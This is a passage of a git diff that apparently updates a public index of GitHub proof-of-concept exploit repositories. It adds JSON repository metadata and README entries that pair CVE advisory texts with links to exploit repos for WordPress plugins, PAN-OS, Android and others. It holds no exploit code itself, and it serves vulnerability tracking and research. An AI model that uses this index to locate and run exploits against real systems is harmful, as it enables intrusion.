b/2024/CVE-2024-9570.json new file mode 100644 index 0000000000..68d62aa315 --- /dev/null +++ b/2024/CVE-2024-9570.json @@ -0,0 +1,33 @@ +[ + { + "id": 871275663, + "name": "CVE-2024-9570_D-Link-DIR-619L-bof", + "full_name": "dylvie\/CVE-2024-9570_D-Link-DIR-619L-bof", + "owner": { + "login": "dylvie", + "id": 78607002, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78607002?v=4", + "html_url": "https:\/\/github.com\/dylvie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dylvie\/CVE-2024-9570_D-Link-DIR-619L-bof", + "description": "Exploit for CVE-2024-9570", + "fork": false, + "created_at": "2024-10-11T16:05:06Z", + "updated_at": "2024-10-14T02:39:01Z", + "pushed_at": "2024-10-11T16:08:06Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9593.json b/2024/CVE-2024-9593.json new file mode 100644 index 0000000000..cd4b64ed00 --- /dev/null +++ b/2024/CVE-2024-9593.json @@ -0,0 +1,95 @@ +[ + { + "id": 874679920, + "name": "CVE-2024-9593", + "full_name": "RandomRobbieBF\/CVE-2024-9593", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9593", + "description": "Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - Unauthenticated (Limited) Remote Code Execution", + "fork": false, + "created_at": "2024-10-18T09:11:03Z", + "updated_at": "2024-10-18T17:57:05Z", + "pushed_at": "2024-10-18T09:14:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 890236164, + "name": "CVE-2024-9593-EXP", + "full_name": "0x4f5da2-venom\/CVE-2024-9593-EXP", + "owner": { + "login": "0x4f5da2-venom", + "id": 130073287, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130073287?v=4", + "html_url": "https:\/\/github.com\/0x4f5da2-venom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x4f5da2-venom\/CVE-2024-9593-EXP", + "description": "CVE-2024-9593 WordPress插件的远程代码执行", + "fork": false, + "created_at": "2024-11-18T08:22:44Z", + "updated_at": "2024-11-18T08:46:15Z", + "pushed_at": "2024-11-18T08:46:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 910842598, + "name": "CVE-2024-9593-Exploit", + "full_name": "Nxploited\/CVE-2024-9593-Exploit", + "owner": { + "login": "Nxploited", + "id": 188819918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188819918?v=4", + "html_url": "https:\/\/github.com\/Nxploited", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nxploited\/CVE-2024-9593-Exploit", + "description": null, + "fork": false, + "created_at": "2025-01-01T15:49:36Z", + "updated_at": "2025-01-01T16:01:25Z", + "pushed_at": "2025-01-01T16:01:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9680.json b/2024/CVE-2024-9680.json new file mode 100644 index 0000000000..db3fabd75d --- /dev/null +++ b/2024/CVE-2024-9680.json @@ -0,0 +1,64 @@ +[ + { + "id": 874322010, + "name": "Firefox-CVE-2024-9680", + "full_name": "tdonaworth\/Firefox-CVE-2024-9680", + "owner": { + "login": "tdonaworth", + "id": 56687505, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56687505?v=4", + "html_url": "https:\/\/github.com\/tdonaworth", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tdonaworth\/Firefox-CVE-2024-9680", + "description": null, + "fork": false, + "created_at": "2024-10-17T16:10:38Z", + "updated_at": "2024-11-29T08:39:46Z", + "pushed_at": "2024-10-17T16:28:17Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 911178997, + "name": "Version_Vulnerability_Scanner", + "full_name": "PraiseImafidon\/Version_Vulnerability_Scanner", + "owner": { + "login": "PraiseImafidon", + "id": 108192872, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108192872?v=4", + "html_url": "https:\/\/github.com\/PraiseImafidon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PraiseImafidon\/Version_Vulnerability_Scanner", + "description": "A vulnerability scanner for Firefox and Thunderbird that checks if your versions are out of date and susceptible to CVE-2024-9680.", + "fork": false, + "created_at": "2025-01-02T12:21:19Z", + "updated_at": "2025-01-02T13:16:42Z", + "pushed_at": "2025-01-02T13:16:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9707.json b/2024/CVE-2024-9707.json new file mode 100644 index 0000000000..668860f150 --- /dev/null +++ b/2024/CVE-2024-9707.json @@ -0,0 +1,33 @@ +[ + { + "id": 871033172, + "name": "CVE-2024-9707", + "full_name": "RandomRobbieBF\/CVE-2024-9707", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9707", + "description": "Hunk Companion <= 1.8.4 - Missing Authorization to Unauthenticated Arbitrary Plugin Installation\/Activation", + "fork": false, + "created_at": "2024-10-11T06:21:38Z", + "updated_at": "2024-10-18T17:57:25Z", + "pushed_at": "2024-10-11T06:25:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9796.json b/2024/CVE-2024-9796.json new file mode 100644 index 0000000000..bbf205093d --- /dev/null +++ b/2024/CVE-2024-9796.json @@ -0,0 +1,64 @@ +[ + { + "id": 874826793, + "name": "CVE-2024-9796", + "full_name": "RandomRobbieBF\/CVE-2024-9796", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9796", + "description": "WordPress WP-Advanced-Search <= 3.3.9 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-10-18T14:30:42Z", + "updated_at": "2024-10-19T01:05:17Z", + "pushed_at": "2024-10-18T14:39:55Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 889251660, + "name": "CVE-2024-9796", + "full_name": "issamjr\/CVE-2024-9796", + "owner": { + "login": "issamjr", + "id": 101994309, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101994309?v=4", + "html_url": "https:\/\/github.com\/issamjr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/issamjr\/CVE-2024-9796", + "description": "WordPress WP-Advanced-Search <= 3.3.9 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-11-15T22:55:18Z", + "updated_at": "2024-12-16T14:47:33Z", + "pushed_at": "2024-11-15T23:04:07Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9821.json b/2024/CVE-2024-9821.json new file mode 100644 index 0000000000..6f058f6f77 --- /dev/null +++ b/2024/CVE-2024-9821.json @@ -0,0 +1,33 @@ +[ + { + "id": 871263157, + "name": "CVE-2024-9821", + "full_name": "RandomRobbieBF\/CVE-2024-9821", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9821", + "description": "Bot for Telegram on WooCommerce <= 1.2.4 - Authenticated (Subscriber+) Telegram Bot Token Disclosure to Authentication Bypass", + "fork": false, + "created_at": "2024-10-11T15:35:39Z", + "updated_at": "2024-10-18T17:57:16Z", + "pushed_at": "2024-10-11T15:47:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9822.json b/2024/CVE-2024-9822.json new file mode 100644 index 0000000000..801ae2a761 --- /dev/null +++ b/2024/CVE-2024-9822.json @@ -0,0 +1,33 @@ +[ + { + "id": 871710418, + "name": "CVE-2024-9822", + "full_name": "RandomRobbieBF\/CVE-2024-9822", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9822", + "description": "Pedalo Connector <= 2.0.5 - Authentication Bypass to Administrator", + "fork": false, + "created_at": "2024-10-12T18:11:16Z", + "updated_at": "2025-01-06T13:36:12Z", + "pushed_at": "2024-10-12T18:13:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9890.json b/2024/CVE-2024-9890.json new file mode 100644 index 0000000000..a14be5647d --- /dev/null +++ b/2024/CVE-2024-9890.json @@ -0,0 +1,33 @@ +[ + { + "id": 885365895, + "name": "CVE-2024-9890", + "full_name": "RandomRobbieBF\/CVE-2024-9890", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9890", + "description": "User Toolkit <= 1.2.3 - Authenticated (Subscriber+) Authentication Bypass", + "fork": false, + "created_at": "2024-11-08T12:56:55Z", + "updated_at": "2024-11-08T12:59:44Z", + "pushed_at": "2024-11-08T12:59:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9926.json b/2024/CVE-2024-9926.json new file mode 100644 index 0000000000..d1c219ba38 --- /dev/null +++ b/2024/CVE-2024-9926.json @@ -0,0 +1,79 @@ +[ + { + "id": 877508313, + "name": "wordpress-jetpack-broken-access-control-vulnerable-application", + "full_name": "m3ssap0\/wordpress-jetpack-broken-access-control-vulnerable-application", + "owner": { + "login": "m3ssap0", + "id": 705120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/705120?v=4", + "html_url": "https:\/\/github.com\/m3ssap0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m3ssap0\/wordpress-jetpack-broken-access-control-vulnerable-application", + "description": "WARNING: This is a vulnerable application to test the exploit for the Jetpack < 13.9.1 broken access control (CVE-2024-9926). Run it at your own risk!", + "fork": false, + "created_at": "2024-10-23T19:12:55Z", + "updated_at": "2024-11-25T03:27:38Z", + "pushed_at": "2024-11-09T11:13:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "broken-access-control", + "cve-2024-9926", + "jetpack", + "vulnerable-application", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 881924384, + "name": "wordpress-jetpack-broken-access-control-exploit", + "full_name": "m3ssap0\/wordpress-jetpack-broken-access-control-exploit", + "owner": { + "login": "m3ssap0", + "id": 705120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/705120?v=4", + "html_url": "https:\/\/github.com\/m3ssap0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m3ssap0\/wordpress-jetpack-broken-access-control-exploit", + "description": "Exploits Jetpack < 13.9.1 broken access control (CVE-2024-9926).", + "fork": false, + "created_at": "2024-11-01T14:03:55Z", + "updated_at": "2024-11-27T13:31:35Z", + "pushed_at": "2024-11-09T11:19:38Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-9926", + "exploit", + "jetpack", + "security", + "security-tools", + "vulnerability", + "vulnerability-scan", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9932.json b/2024/CVE-2024-9932.json new file mode 100644 index 0000000000..5086266a89 --- /dev/null +++ b/2024/CVE-2024-9932.json @@ -0,0 +1,33 @@ +[ + { + "id": 883779888, + "name": "CVE-2024-9932", + "full_name": "RandomRobbieBF\/CVE-2024-9932", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9932", + "description": "Wux Blog Editor <= 3.0.0 - Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2024-11-05T15:00:39Z", + "updated_at": "2024-12-31T05:05:46Z", + "pushed_at": "2024-11-05T15:02:04Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9933.json b/2024/CVE-2024-9933.json new file mode 100644 index 0000000000..4436730fc1 --- /dev/null +++ b/2024/CVE-2024-9933.json @@ -0,0 +1,64 @@ +[ + { + "id": 883936829, + "name": "CVE-2024-9933", + "full_name": "RandomRobbieBF\/CVE-2024-9933", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9933", + "description": "WatchTowerHQ <= 3.10.1 - Authentication Bypass to Administrator due to Missing Empty Value Check", + "fork": false, + "created_at": "2024-11-05T20:55:09Z", + "updated_at": "2024-11-05T20:58:15Z", + "pushed_at": "2024-11-05T20:58:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 908944974, + "name": "CVE-2024-9933", + "full_name": "Nxploited\/CVE-2024-9933", + "owner": { + "login": "Nxploited", + "id": 188819918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188819918?v=4", + "html_url": "https:\/\/github.com\/Nxploited", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nxploited\/CVE-2024-9933", + "description": null, + "fork": false, + "created_at": "2024-12-27T11:03:42Z", + "updated_at": "2024-12-27T11:12:57Z", + "pushed_at": "2024-12-27T11:12:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9935.json b/2024/CVE-2024-9935.json new file mode 100644 index 0000000000..8c0d8003dc --- /dev/null +++ b/2024/CVE-2024-9935.json @@ -0,0 +1,102 @@ +[ + { + "id": 890288552, + "name": "CVE-2024-9935", + "full_name": "RandomRobbieBF\/CVE-2024-9935", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9935", + "description": "PDF Generator Addon for Elementor Page Builder <= 1.7.5 - Unauthenticated Arbitrary File Download", + "fork": false, + "created_at": "2024-11-18T10:14:45Z", + "updated_at": "2024-12-17T20:19:31Z", + "pushed_at": "2024-11-18T10:15:49Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 905650504, + "name": "CVE-2024-9935", + "full_name": "verylazytech\/CVE-2024-9935", + "owner": { + "login": "verylazytech", + "id": 172168670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172168670?v=4", + "html_url": "https:\/\/github.com\/verylazytech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/verylazytech\/CVE-2024-9935", + "description": "PDF Generator Addon for Elementor Page Builder <= 1.7.5 - Unauthenticated Arbitrary File Download", + "fork": false, + "created_at": "2024-12-19T08:57:30Z", + "updated_at": "2025-01-05T02:04:16Z", + "pushed_at": "2024-12-19T09:43:37Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-9935", + "elementor-page-builder", + "lfi", + "lfi-exploitation", + "unauthenticated-arbitrary-file-download", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 908375813, + "name": "CVE-2024-9935", + "full_name": "Nxploited\/CVE-2024-9935", + "owner": { + "login": "Nxploited", + "id": 188819918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188819918?v=4", + "html_url": "https:\/\/github.com\/Nxploited", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nxploited\/CVE-2024-9935", + "description": null, + "fork": false, + "created_at": "2024-12-25T22:59:07Z", + "updated_at": "2024-12-25T23:04:49Z", + "pushed_at": "2024-12-25T23:04:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9955.json b/2024/CVE-2024-9955.json new file mode 100644 index 0000000000..77742d1517 --- /dev/null +++ b/2024/CVE-2024-9955.json @@ -0,0 +1,33 @@ +[ + { + "id": 881563522, + "name": "CVE-2024-9955-POC", + "full_name": "amfg145\/CVE-2024-9955-POC", + "owner": { + "login": "amfg145", + "id": 16266637, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16266637?v=4", + "html_url": "https:\/\/github.com\/amfg145", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amfg145\/CVE-2024-9955-POC", + "description": "Fortinet Privilege Escalation Advisory CVE-2024-9955-POC: Elevation to Domain Admin on FortiOS and FortiProxy", + "fork": false, + "created_at": "2024-10-31T20:23:15Z", + "updated_at": "2024-11-06T15:37:39Z", + "pushed_at": "2024-10-31T20:35:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/README.md b/README.md index f61eaa477f..0a5a689f2e 100644 --- a/README.md +++ b/README.md @@ -1,19 +1,16602 @@ # PoC in GitHub ## 2024 +### CVE-2024-0012 (2024-11-18) + +An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474 https://security.paloaltonetworks.com/CVE-2024-9474 .\n\nThe risk of this issue is greatly reduced if you secure access to the management web interface by restricting access to only trusted internal IP addresses according to our recommended  best practice deployment guidelines https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431 .\n\nThis issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, PAN-OS 11.1, and PAN-OS 11.2 software.\n\nCloud NGFW and Prisma Access are not impacted by this vulnerability. + + +- [watchtowrlabs/palo-alto-panos-cve-2024-0012](https://github.com/watchtowrlabs/palo-alto-panos-cve-2024-0012) +- [Sachinart/CVE-2024-0012-POC](https://github.com/Sachinart/CVE-2024-0012-POC) +- [greaselovely/CVE-2024-0012](https://github.com/greaselovely/CVE-2024-0012) +- [VegetableLasagne/CVE-2024-0012](https://github.com/VegetableLasagne/CVE-2024-0012) +- [iSee857/CVE-2024-0012-poc](https://github.com/iSee857/CVE-2024-0012-poc) +- [XiaomingX/cve-2024-0012-poc](https://github.com/XiaomingX/cve-2024-0012-poc) +- [punitdarji/Paloalto-CVE-2024-0012](https://github.com/punitdarji/Paloalto-CVE-2024-0012) +- [0xjessie21/CVE-2024-0012](https://github.com/0xjessie21/CVE-2024-0012) +- [TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC](https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC) + +### CVE-2024-0015 (2024-02-16) + +In convertToComponentName of DreamService.java, there is a possible way to launch arbitrary protected activities due to intent redirection. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. + + +- [UmVfX1BvaW50/CVE-2024-0015](https://github.com/UmVfX1BvaW50/CVE-2024-0015) + +### CVE-2024-0023 (2024-02-16) + +In ConvertRGBToPlanarYUV of Codec2BufferUtils.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [AbrarKhan/G3_Frameworks_av_CVE-2024-0023](https://github.com/AbrarKhan/G3_Frameworks_av_CVE-2024-0023) +- [Aakashmom/frameworks_av_android10_r33_CVE-2024-0023](https://github.com/Aakashmom/frameworks_av_android10_r33_CVE-2024-0023) + +### CVE-2024-0030 (2024-02-16) + +In btif_to_bta_response of btif_gatt_util.cc, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [uthrasri/system_bt_CVE-2024-0030](https://github.com/uthrasri/system_bt_CVE-2024-0030) + +### CVE-2024-0039 (2024-03-11) + +In attp_build_value_cmd of att_protocol.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [41yn14/CVE-2024-0039-Exploit](https://github.com/41yn14/CVE-2024-0039-Exploit) + +### CVE-2024-0040 (2024-02-16) + +In setParameter of MtpPacket.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-0040](https://github.com/nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-0040) +- [uthrasri/frameworks_av_CVE-2024-0040](https://github.com/uthrasri/frameworks_av_CVE-2024-0040) + +### CVE-2024-0044 (2024-03-11) + +In createSessionInternal of PackageInstallerService.java, there is a possible run-as any app due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n + + +- [scs-labrat/android_autorooter](https://github.com/scs-labrat/android_autorooter) +- [0xbinder/CVE-2024-0044](https://github.com/0xbinder/CVE-2024-0044) +- [Re13orn/CVE-2024-0044-EXP](https://github.com/Re13orn/CVE-2024-0044-EXP) +- [007CRIPTOGRAFIA/c-CVE-2024-0044](https://github.com/007CRIPTOGRAFIA/c-CVE-2024-0044) +- [Kai2er/CVE-2024-0044-EXP](https://github.com/Kai2er/CVE-2024-0044-EXP) +- [hunter24x24/cve_2024_0044](https://github.com/hunter24x24/cve_2024_0044) +- [nexussecelite/EvilDroid](https://github.com/nexussecelite/EvilDroid) +- [nahid0x1/CVE-2024-0044](https://github.com/nahid0x1/CVE-2024-0044) +- [MrW0l05zyn/cve-2024-0044](https://github.com/MrW0l05zyn/cve-2024-0044) +- [canyie/CVE-2024-0044](https://github.com/canyie/CVE-2024-0044) +- [Dit-Developers/CVE-2024-0044-](https://github.com/Dit-Developers/CVE-2024-0044-) + +### CVE-2024-0049 (2024-03-11) + +In multiple locations, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-0049](https://github.com/nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-0049) +- [Aakashmom/frameworks_av_android10_r33_CVE-2024-0049](https://github.com/Aakashmom/frameworks_av_android10_r33_CVE-2024-0049) + +### CVE-2024-0195 (2024-01-02) + +Es wurde eine Schwachstelle in spider-flow 0.4.3 gefunden. Sie wurde als kritisch eingestuft. Es betrifft die Funktion FunctionService.saveFunction der Datei src/main/java/org/spiderflow/controller/FunctionController.java. Durch Manipulieren mit unbekannten Daten kann eine code injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [Cappricio-Securities/CVE-2024-0195](https://github.com/Cappricio-Securities/CVE-2024-0195) +- [gh-ost00/CVE-2024-0195-SpiderFlow](https://github.com/gh-ost00/CVE-2024-0195-SpiderFlow) +- [MuhammadWaseem29/CVE-2024-0195-SpiderFlow](https://github.com/MuhammadWaseem29/CVE-2024-0195-SpiderFlow) +- [hack-with-rohit/CVE-2024-0195-SpiderFlow](https://github.com/hack-with-rohit/CVE-2024-0195-SpiderFlow) + +### CVE-2024-0197 (2024-02-27) + +A flaw in the installer for Thales SafeNet Sentinel HASP LDK prior to 9.16 on Windows allows an attacker to escalate their privilege level via local access.\n\n + + +- [ewilded/CVE-2024-0197-POC](https://github.com/ewilded/CVE-2024-0197-POC) + +### CVE-2024-0204 (2024-01-22) + +Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal. + + +- [horizon3ai/CVE-2024-0204](https://github.com/horizon3ai/CVE-2024-0204) +- [cbeek-r7/CVE-2024-0204](https://github.com/cbeek-r7/CVE-2024-0204) +- [m-cetin/CVE-2024-0204](https://github.com/m-cetin/CVE-2024-0204) +- [adminlove520/CVE-2024-0204](https://github.com/adminlove520/CVE-2024-0204) + +### CVE-2024-0230 (2024-01-12) + +A session management issue was addressed with improved checks. This issue is fixed in Magic Keyboard Firmware Update 2.0.6. An attacker with physical access to the accessory may be able to extract its Bluetooth pairing key and monitor Bluetooth traffic. + + +- [keldnorman/cve-2024-0230-blue](https://github.com/keldnorman/cve-2024-0230-blue) + +### CVE-2024-0235 (2024-01-16) + +The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorisation in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog + + +- [Cappricio-Securities/CVE-2024-0235](https://github.com/Cappricio-Securities/CVE-2024-0235) + 